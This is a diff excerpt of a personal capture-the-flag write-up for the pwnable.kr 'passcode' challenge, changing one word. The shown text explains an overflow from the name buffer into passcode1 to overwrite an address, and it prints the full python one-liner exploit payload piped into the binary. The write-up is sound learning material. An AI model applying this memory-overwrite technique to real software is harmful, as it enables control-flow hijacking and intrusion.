drebelsky/drebelsky.github.io/docs/notes/pwnable.kr/passcode.md

 Overwritten completely at 100 a's
 ```

 Which, to be fair, is probably what one would guess if they had one guess.
 But, this gives us everything we need for the exploit: we can use name to set `passcode1` to 0x804a004 and then write the value 0x80485d7 = 134514135 to it.
-Using a really long one-liner: `python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 96 + 0x804a004.to_bytes(4, "little") + b"\n134514135\n")' | ./passcode`, we obtain the flag.
+Using a long one-liner: `python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 96 + 0x804a004.to_bytes(4, "little") + b"\n134514135\n")' | ./passcode`, we obtain the flag.

 To expand upon later: